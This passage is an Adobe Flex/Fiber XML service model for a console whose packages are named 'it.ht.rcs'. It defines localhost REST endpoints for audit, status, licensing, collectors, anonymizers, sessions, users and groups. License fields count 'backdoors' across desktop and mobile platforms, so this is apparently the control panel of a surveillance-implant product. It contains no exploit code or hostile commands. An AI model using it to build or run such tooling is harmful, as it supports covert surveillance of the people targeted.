
<model xmlns="http://ns.adobe.com/Fiber/1.0">
  <annotation name="ActionScriptGeneration">
    <item name="FullyQualifyReferences">true</item>
  </annotation>
  <service name="DBAudit">
    <annotation name="ActionScriptGeneration">
      <item name="ServiceType">HTTPMultiService</item>
      <item name="Package">it.ht.rcs.console.audit.rest</item>
      <item name="rootURL">https://localhost:4444</item>
    </annotation>
    <annotation name="ServiceTypeGroup">
      <item name="ServiceBackendType">HTTPService</item>
    </annotation>
    <annotation name="ServiceConfig">
      <item name="DEFAULT_ENTITY_PACKAGE">it.ht.rcs.console.audit.model</item>
      <item name="LINKED_FILE"></item>
    </annotation>
    <function name="all_" return-type="Audit[]">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/audit</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/audit</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">backdoor,operation,time,desc,_id,target,action,actor,group,user</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">filter,startIndex,numItems</item>
        <item name="inputParams">string,integer,integer</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="filter" type="string"/>
      <parameter name="startIndex" type="integer"/>
      <parameter name="numItems" type="integer"/>
    </function>
    <function name="count_" return-type="integer">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.xml.XMLSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/audit/count</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/audit/count</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">filter</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="filter" type="string"/>
    </function>
    <function name="filters_" return-type="AuditFilter">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/audit/filters</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/audit/filters</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">backdoor,operation,_id,target,action,actor,user</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
      </annotation>
    </function>
  </service>
  <entity name="AuditFilter">
    <annotation name="EntityProperties">
      <item name="EntityOriginalName">AuditFilter</item>
    </annotation>
    <annotation name="service Group">
      <item name="service">DBAudit</item>
    </annotation>
    <annotation name="ServerProperties">
      <item name="IncludeRemoteClass">nonempty</item>
    </annotation>
    <annotation name="filters_">
      <item name="propertySpecifier">backdoor,operation,_id,target,action,actor,user</item>
    </annotation>
    <annotation name="ActionScriptGeneration">
      <item name="Package">it.ht.rcs.console.audit.model</item>
    </annotation>
    <property name="backdoor" type="opaque[]" required="true"/>
    <property name="operation" type="opaque[]" required="true"/>
    <property name="_id" type="string" required="true"/>
    <property name="target" type="opaque[]" required="true"/>
    <property name="action" type="string[]" required="true"/>
    <property name="actor" type="string[]" required="true"/>
    <property name="user" type="string[]" required="true"/>
  </entity>
  <entity name="Audit" persistent="true">
    <annotation name="EntityProperties">
      <item name="EntityOriginalName">Audit</item>
    </annotation>
    <annotation name="service Group">
      <item name="service">DBAudit</item>
    </annotation>
    <annotation name="ServerProperties">
      <item name="IncludeRemoteClass">nonempty</item>
    </annotation>
    <annotation name="all_">
      <item name="propertySpecifier">backdoor,operation,time,desc,_id,target,action,actor,group,user</item>
      <item name="pagingEnabled">true</item>
      <item name="positionalPagingParameters">true</item>
      <item name="countOperation">count_</item>
    </annotation>
    <annotation name="ActionScriptGeneration">
      <item name="Package">it.ht.rcs.console.audit.model</item>
    </annotation>
    <annotation name="DataManagement">
      <item name="managingService">DBAudit</item>
      <item name="fillFunc">all_</item>
    </annotation>
    <property name="backdoor" type="string" required="true"/>
    <property name="operation" type="string" required="true"/>
    <property name="time" type="integer" required="true"/>
    <property name="desc" type="string" required="true"/>
    <id name="_id" type="string"/>
    <property name="target" type="string" required="true"/>
    <property name="action" type="string" required="true"/>
    <property name="actor" type="string" required="true"/>
    <property name="group" type="string" required="true"/>
    <property name="user" type="string" required="true"/>
  </entity>
  <service name="DBMonitor">
    <annotation name="ActionScriptGeneration">
      <item name="ServiceType">HTTPMultiService</item>
      <item name="Package">it.ht.rcs.console.monitor.rest</item>
      <item name="rootURL">https://localhost:4444</item>
    </annotation>
    <annotation name="ServiceTypeGroup">
      <item name="ServiceBackendType">HTTPService</item>
    </annotation>
    <annotation name="ServiceConfig">
      <item name="DEFAULT_ENTITY_PACKAGE">it.ht.rcs.console.monitor.model</item>
      <item name="LINKED_FILE"></item>
    </annotation>
    <function name="all_" return-type="Status[]">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/status</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/status</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">time,updated_at,_id,status,address,name,disk,cpu,created_at,pcpu,info</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
      </annotation>
    </function>
    <function name="destroy_" return-type="opaque">
      <annotation name="analyze group">
        <item name="analyzed">false</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/status/destroy</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/status/destroy</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
    <function name="counters_" return-type="StatusCounters">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/status/counters</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/status/counters</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">warn,error,ok</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
      </annotation>
    </function>
  </service>
  <entity name="Status">
    <annotation name="EntityProperties">
      <item name="EntityOriginalName">Status</item>
    </annotation>
    <annotation name="service Group">
      <item name="service">DBMonitor</item>
    </annotation>
    <annotation name="ServerProperties">
      <item name="IncludeRemoteClass">nonempty</item>
    </annotation>
    <annotation name="all">
      <item name="propertySpecifier">time,updated_at,_id,status,address,name,disk,cpu,created_at,pcpu,info</item>
    </annotation>
    <annotation name="ActionScriptGeneration">
      <item name="Package">it.ht.rcs.console.monitor.model</item>
    </annotation>
    <property name="time" type="integer" required="true"/>
    <property name="updated_at" type="string" required="true"/>
    <property name="_id" type="string" required="true"/>
    <property name="status" type="string" required="true"/>
    <property name="address" type="string" required="true"/>
    <property name="name" type="string" required="true"/>
    <property name="disk" type="integer" required="true"/>
    <property name="cpu" type="integer" required="true"/>
    <property name="created_at" type="string" required="true"/>
    <property name="pcpu" type="integer" required="true"/>
    <property name="info" type="string" required="true"/>
  </entity>
  <entity name="StatusCounters">
    <annotation name="EntityProperties">
      <item name="EntityOriginalName">StatusCounters</item>
    </annotation>
    <annotation name="service Group">
      <item name="service">DBMonitor</item>
    </annotation>
    <annotation name="ServerProperties">
      <item name="IncludeRemoteClass">nonempty</item>
    </annotation>
    <annotation name="counters">
      <item name="propertySpecifier">warn,error,ok</item>
    </annotation>
    <annotation name="ActionScriptGeneration">
      <item name="Package">it.ht.rcs.console.monitor.model</item>
    </annotation>
    <property name="warn" type="integer" required="true"/>
    <property name="error" type="integer" required="true"/>
    <property name="ok" type="integer" required="true"/>
  </entity>
  <service name="DBLicense">
    <annotation name="ActionScriptGeneration">
      <item name="ServiceType">HTTPMultiService</item>
      <item name="Package">it.ht.rcs.console.monitor.rest</item>
      <item name="rootURL">https://localhost:4444</item>
    </annotation>
    <annotation name="ServiceTypeGroup">
      <item name="ServiceBackendType">HTTPService</item>
    </annotation>
    <annotation name="ServiceConfig">
      <item name="DEFAULT_ENTITY_PACKAGE">it.ht.rcs.console.monitor.model</item>
      <item name="LINKED_FILE"></item>
    </annotation>
    <function name="count_" return-type="LicenseCount">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/license/count</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/license/count</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">collectors,users,ipa,backdoors</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
      </annotation>
    </function>
    <function name="limit_" return-type="License">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/license/limit</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/license/limit</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">collectors,users,ipa,backdoors,alerting,correlation,type,serial,rmi</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
      </annotation>
    </function>
  </service>
  <entity name="License">
    <annotation name="EntityProperties">
      <item name="EntityOriginalName">License</item>
    </annotation>
    <annotation name="service Group">
      <item name="service">DBLicense</item>
    </annotation>
    <annotation name="ServerProperties">
      <item name="IncludeRemoteClass">nonempty</item>
    </annotation>
    <annotation name="limit">
      <item name="propertySpecifier">collectors,users,ipa,backdoors,alerting,correlation,type,serial,rmi</item>
    </annotation>
    <annotation name="ActionScriptGeneration">
      <item name="Package">it.ht.rcs.console.monitor.model</item>
    </annotation>
    <property name="collectors" type="LicenseCollectors"/>
    <property name="users" type="opaque"/>
    <property name="ipa" type="integer"/>
    <property name="backdoors" type="LicenseBackdoors"/>
    <property name="alerting" type="boolean"/>
    <property name="correlation" type="boolean"/>
    <property name="type" type="string"/>
    <property name="serial" type="string"/>
    <property name="rmi" type="boolean"/>
  </entity>
  <entity name="LicenseCount">
    <annotation name="EntityProperties">
      <item name="EntityOriginalName">LicenseCount</item>
    </annotation>
    <annotation name="service Group">
      <item name="service">DBLicense</item>
    </annotation>
    <annotation name="ServerProperties">
      <item name="IncludeRemoteClass">nonempty</item>
    </annotation>
    <annotation name="count">
      <item name="propertySpecifier">collectors,users,ipa,backdoors</item>
    </annotation>
    <annotation name="ActionScriptGeneration">
      <item name="Package">it.ht.rcs.console.monitor.model</item>
    </annotation>
    <property name="collectors" type="LicenseCollectors" required="true"/>
    <property name="users" type="integer" required="true"/>
    <property name="ipa" type="integer" required="true"/>
    <property name="backdoors" type="LicenseBackdoors" required="true"/>
  </entity>
  <entity name="LicenseCollectors">
    <annotation name="EntityProperties">
      <item name="EntityOriginalName">Collectors</item>
    </annotation>
    <annotation name="service Group">
      <item name="service">DBLicense</item>
    </annotation>
    <annotation name="ServerProperties">
      <item name="IncludeRemoteClass">nonempty</item>
    </annotation>
    <annotation name="ActionScriptGeneration">
      <item name="Package">it.ht.rcs.console.monitor.model</item>
    </annotation>
    <property name="collectors" type="integer"/>
    <property name="anonymizers" type="integer"/>
  </entity>
  <entity name="LicenseBackdoors">
    <annotation name="EntityProperties">
      <item name="EntityOriginalName">Backdoors</item>
    </annotation>
    <annotation name="service Group">
      <item name="service">DBLicense</item>
    </annotation>
    <annotation name="ServerProperties">
      <item name="IncludeRemoteClass">nonempty</item>
    </annotation>
    <annotation name="ActionScriptGeneration">
      <item name="Package">it.ht.rcs.console.monitor.model</item>
    </annotation>
    <property name="symbian" type="boolean" required="true"/>
    <property name="blackberry" type="boolean" required="true"/>
    <property name="osx" type="boolean" required="true"/>
    <property name="total" type="opaque"/>
    <property name="android" type="boolean" required="true"/>
    <property name="ios" type="boolean" required="true"/>
    <property name="desktop" type="opaque"/>
    <property name="windows" type="boolean" required="true"/>
    <property name="winmo" type="boolean" required="true"/>
    <property name="linux" type="boolean" required="true"/>
    <property name="mobile" type="opaque"/>
  </entity>
  <service name="DBNetwork">
    <annotation name="ActionScriptGeneration">
      <item name="ServiceType">HTTPMultiService</item>
      <item name="Package">it.ht.rcs.console.network.rest</item>
      <item name="rootURL">http://localhost:4444</item>
    </annotation>
    <annotation name="ServiceTypeGroup">
      <item name="ServiceBackendType">HTTPService</item>
    </annotation>
    <annotation name="ServiceConfig">
      <item name="DEFAULT_ENTITY_PACKAGE">it.ht.rcs.console.network.model</item>
      <item name="LINKED_FILE"></item>
    </annotation>
    <function name="all_" return-type="Collector[]">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/network/all</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">http://localhost:4444/network/all</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">port,desc,configured,next,type,version,prev,updated_at,poll,_id,address,name,created_at,_mid,instance</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
      </annotation>
    </function>
    <function name="show_" return-type="Collector">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.xml.XMLSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/network/show</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">http://localhost:4444/network/show</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">port,desc,configured,next,type,version,prev,updated_at,poll,_id,address,name,created_at,_mid,instance</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">id</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="id" type="string"/>
    </function>
    <function name="log_" return-type="opaque">
      <annotation name="analyze group">
        <item name="analyzed">false</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="method">GET</item>
        <item name="url">/network/log</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">http://localhost:4444/network/log</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">id</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="id" type="string"/>
    </function>
    <function name="update_" return-type="opaque">
      <annotation name="analyze group">
        <item name="analyzed">false</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/network/update</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">http://localhost:4444/network/update</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
    <function name="create_" return-type="opaque">
      <annotation name="analyze group">
        <item name="analyzed">false</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/network/create</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">http://localhost:4444/network/create</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
    <function name="destroy_" return-type="opaque">
      <annotation name="analyze group">
        <item name="analyzed">false</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/network/destroy</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">http://localhost:4444/network/destroy</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
  </service>
  <entity name="Collector">
    <annotation name="EntityProperties">
      <item name="EntityOriginalName">Collector</item>
    </annotation>
    <annotation name="service Group">
      <item name="service">DBNetwork</item>
    </annotation>
    <annotation name="ServerProperties">
      <item name="IncludeRemoteClass">nonempty</item>
    </annotation>
    <annotation name="all_">
      <item name="propertySpecifier">port,desc,configured,next,type,version,prev,updated_at,poll,_id,address,name,created_at,_mid,instance</item>
    </annotation>
    <annotation name="ActionScriptGeneration">
      <item name="Package">it.ht.rcs.console.network.model</item>
    </annotation>
    <annotation name="show_">
      <item name="propertySpecifier">port,desc,configured,next,type,version,prev,updated_at,poll,_id,address,name,created_at,_mid,instance</item>
    </annotation>
    <property name="port" type="integer" required="true"/>
    <property name="desc" type="string" required="true"/>
    <property name="configured" type="boolean" required="true"/>
    <property name="next" type="string[]" required="true"/>
    <property name="type" type="string" required="true"/>
    <property name="version" type="integer" required="true"/>
    <property name="prev" type="opaque[]" required="true"/>
    <property name="updated_at" type="string" required="true"/>
    <property name="poll" type="boolean" required="true"/>
    <property name="_id" type="string" required="true"/>
    <property name="address" type="string" required="true"/>
    <property name="name" type="string" required="true"/>
    <property name="created_at" type="string" required="true"/>
    <property name="_mid" type="integer" required="true"/>
    <property name="instance" type="string" required="true"/>
  </entity>
  <service name="DBSession">
    <annotation name="ActionScriptGeneration">
      <item name="ServiceType">HTTPMultiService</item>
      <item name="Package">it.ht.rcs.console.accounting.rest</item>
      <item name="rootURL">https://localhost:4444</item>
    </annotation>
    <annotation name="ServiceTypeGroup">
      <item name="ServiceBackendType">HTTPService</item>
    </annotation>
    <annotation name="ServiceConfig">
      <item name="DEFAULT_ENTITY_PACKAGE">it.ht.rcs.console.accounting.model</item>
      <item name="LINKED_FILE"></item>
    </annotation>
    <function name="login_" return-type="Session">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/auth/login</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/auth/login</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">cookie,time,level,address,user</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
    <function name="logout_" return-type="void">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.xml.XMLSerializationFilter</item>
        <item name="method">POST</item>
        <item name="contentType">application/x-www-form-urlencoded</item>
        <item name="requestBodyParameter">false</item>
        <item name="url">/auth/logout</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/auth/logout</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
      </annotation>
    </function>
    <function name="all_" return-type="Session[]">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/session</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/session</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">cookie,time,level,address,user</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
      </annotation>
    </function>
    <function name="destroy_" return-type="void">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.xml.XMLSerializationFilter</item>
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/session/destroy</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/session/destroy</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
  </service>
  <entity name="Session">
    <annotation name="EntityProperties">
      <item name="EntityOriginalName">Session</item>
    </annotation>
    <annotation name="service Group">
      <item name="service">DBSession</item>
    </annotation>
    <annotation name="ServerProperties">
      <item name="IncludeRemoteClass">nonempty</item>
    </annotation>
    <annotation name="login_">
      <item name="propertySpecifier">cookie,time,level,address,user</item>
    </annotation>
    <annotation name="ActionScriptGeneration">
      <item name="Package">it.ht.rcs.console.accounting.model</item>
    </annotation>
    <annotation name="all_">
      <item name="propertySpecifier">cookie,time,level,address,user</item>
    </annotation>
    <property name="cookie" type="string"/>
    <property name="time" type="integer"/>
    <property name="level" type="string[]"/>
    <property name="address" type="string"/>
    <property name="user" type="User"/>
  </entity>
  <service name="DBUser">
    <annotation name="ActionScriptGeneration">
      <item name="ServiceType">HTTPMultiService</item>
      <item name="Package">it.ht.rcs.console.accounting.rest</item>
      <item name="rootURL">https://localhost:4444</item>
    </annotation>
    <annotation name="ServiceTypeGroup">
      <item name="ServiceBackendType">HTTPService</item>
    </annotation>
    <annotation name="ServiceConfig">
      <item name="DEFAULT_ENTITY_PACKAGE">it.ht.rcs.console.accounting.model</item>
      <item name="LINKED_FILE"></item>
    </annotation>
    <function name="all_" return-type="User[]">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/user</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/user</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">enabled,timezone,updated_at,desc,_id,privs,group_ids,name,locale,created_at,contact,pass</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
      </annotation>
    </function>
    <function name="create_" return-type="User">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/user</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/user</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">enabled,timezone,updated_at,desc,_id,privs,group_ids,name,locale,created_at,contact,pass</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
    <function name="destroy_" return-type="void">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.xml.XMLSerializationFilter</item>
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/user/destroy</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/user/destroy</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
    <function name="show_" return-type="User">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/user/{id}</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/user/{id}</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">enabled,desc,group_ids,locale,contact,pass,not_exist,timezone,updated_at,_id,privs,name,created_at</item>
      </annotation>
      <annotation name="Properties">
        <item name="urlParamNames">id</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">id</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="id" type="string"/>
    </function>
    <function name="update_" return-type="User">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/user/update</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/user/update</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">enabled,desc,group_ids,locale,contact,pass,not_exist,timezone,updated_at,_id,privs,name,created_at</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="strXml" type="string"/>
    </function>
  </service>
  <entity name="User">
    <annotation name="EntityProperties">
      <item name="EntityOriginalName">User</item>
    </annotation>
    <annotation name="service Group">
      <item name="service">DBUser,DBSession</item>
    </annotation>
    <annotation name="ServerProperties">
      <item name="IncludeRemoteClass">nonempty</item>
    </annotation>
    <annotation name="ActionScriptGeneration">
      <item name="Package">it.ht.rcs.console.accounting.model</item>
    </annotation>
    <annotation name="all_">
      <item name="propertySpecifier">enabled,timezone,updated_at,desc,_id,privs,group_ids,name,locale,created_at,contact,pass</item>
    </annotation>
    <annotation name="create_">
      <item name="propertySpecifier">enabled,timezone,updated_at,desc,_id,privs,group_ids,name,locale,created_at,contact,pass</item>
    </annotation>
    <annotation name="show_">
      <item name="propertySpecifier">enabled,desc,group_ids,locale,contact,pass,not_exist,timezone,updated_at,_id,privs,name,created_at</item>
    </annotation>
    <annotation name="update_">
      <item name="propertySpecifier">enabled,desc,group_ids,locale,contact,pass,not_exist,timezone,updated_at,_id,privs,name,created_at</item>
    </annotation>
    <property name="_mid" type="integer"/>
    <property name="enabled" type="boolean"/>
    <property name="desc" type="string"/>
    <property name="group_ids" type="opaque[]"/>
    <property name="locale" type="string"/>
    <property name="contact" type="string"/>
    <property name="pass" type="string"/>
    <property name="not_exist" type="string"/>
    <property name="timezone" type="integer"/>
    <property name="updated_at" type="string"/>
    <property name="_id" type="string"/>
    <property name="privs" type="string[]"/>
    <property name="name" type="string"/>
    <property name="created_at" type="string"/>
  </entity>
  <service name="DBGroup">
    <annotation name="ActionScriptGeneration">
      <item name="ServiceType">HTTPMultiService</item>
      <item name="Package">it.ht.rcs.console.accounting.rest</item>
      <item name="rootURL">https://localhost:4444</item>
    </annotation>
    <annotation name="ServiceTypeGroup">
      <item name="ServiceBackendType">HTTPService</item>
    </annotation>
    <annotation name="ServiceConfig">
      <item name="DEFAULT_ENTITY_PACKAGE">it.ht.rcs.console.accounting.model</item>
      <item name="LINKED_FILE"></item>
    </annotation>
    <function name="all_" return-type="Group[]">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/group</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/group</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">updated_at,item_ids,_id,alert,name,created_at,user_ids</item>
      </annotation>
      <annotation name="original signature">
        <item name="returnType">opaque</item>
      </annotation>
    </function>
    <function name="show_" return-type="Group">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">GET</item>
        <item name="url">/group/{id}</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/group/{id}</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">updated_at,item_ids,_id,name,created_at,user_ids</item>
      </annotation>
      <annotation name="Properties">
        <item name="urlParamNames">id</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">id</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
      <parameter name="id" type="string"/>
    </function>
    <function name="update_" return-type="Group">
      <annotation name="analyze group">
        <item name="analyzed">true</item>
      </annotation>
      <annotation name="ActionScriptGeneration">
        <item name="SerializationFilter">com.adobe.serializers.json.JSONSerializationFilter</item>
        <item name="method">POST</item>
        <item name="contentType">application/xml</item>
        <item name="requestBodyParameter">true</item>
        <item name="url">/group/update</item>
      </annotation>
      <annotation name="url group">
        <item name="completeURL">https://localhost:4444/group/update</item>
      </annotation>
      <annotation name="ValidProperties">
        <item name="propertySpecifier">updated_at,item_ids,_id,name,created_at,user_ids</item>
      </annotation>
      <annotation name="original signature">
        <item name="inputParamNames">strXml</item>
        <item name="inputParams">string</item>
        <item name="returnType">opaque</item>
      </annotation>
